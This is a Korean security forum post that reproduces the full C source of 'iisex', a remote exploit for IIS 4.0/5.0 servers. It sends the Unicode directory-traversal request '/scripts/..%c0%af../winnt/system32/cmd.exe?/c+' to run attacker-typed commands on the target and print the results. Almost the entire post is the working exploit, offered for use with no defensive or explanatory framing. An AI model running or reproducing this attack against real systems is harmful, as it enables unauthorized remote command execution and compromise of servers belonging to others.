security

Total 112
Today 0
profile_image
운영자
01-03-28 21:26 0개 2,363회
IIS 4.0/5.0 exploit 소스
/* iisex iis Remote Exploit (<- nost's idea) v2

* --------------------------------------

* Okay.. the first piece of code was not really finished.

* So, i apologize to everybody..

*

* by incubus

*

* grtz to: Bio, nos, zoa, reg and vor... (who else would stay up

* at night to exploit this?) to securax (#securax@efnet) - also

* to kim, glyc, s0ph, tessa, lamagra and steven.

* thx to spydir :)

*/



#include < netdb.h>

#include < netinet/in.h>

#include < sys/types.h>

#include < sys/socket.h>

#include < stdio.h>

#include < stdlib.h>

#include < string.h>

#include < errno.h>



int main(int argc, char **argv){

char buffy[666]; /* well, what else? I dunno how long your commands are.. */

char buf[500];

char rcvbuf[8192];

int i, sock, result;

struct sockaddr_in name;

struct hostent *hostinfo;

if (argc < 2){

printf ("try %s www.server.comn", argv[0]);

printf ("will let you play with cmd.exe of an IIS4/5 server.n");

printf ("by incubus [incubus@securax.org]nn");

exit(0);

}

printf ("niisex - iis 4 and 5 exploitn---------------------------n");

printf ("act like a cmd.exe kiddie, type quit to quit.n");

for (;;)

{

printf ("n[enter cmd> ");

gets(buf);

if (strstr(buf, "quit")) exit(0);

i=0;

while (buf[i] != ''){

if(buf[i] == 32) buf[i] = 43;

i++;

}

hostinfo=gethostbyname(argv[1]);

if (!hostinfo){

herror("Oops"); exit(-1);

}



name.sin_family=AF_INET; name.sin_port=htons(80);

name.sin_addr=*(struct in_addr *)hostinfo->h_addr;

sock=socket(AF_INET, SOCK_STREAM, 0);

result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));

if (result != 0) { herror("Oops"); exit(-1); }

if (sock < 0){

herror("Oops"); exit(-1); }

strcpy(buffy,"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+");

strcat(buffy,buf);

strcat(buffy, " HTTP/1.0nn");

send(sock, buffy, sizeof(buffy), 0);

recv(sock, rcvbuf, sizeof(rcvbuf), 0);

printf ("%s", rcvbuf);

close(sock);

}

}

댓글목록

등록된 댓글이 없습니다.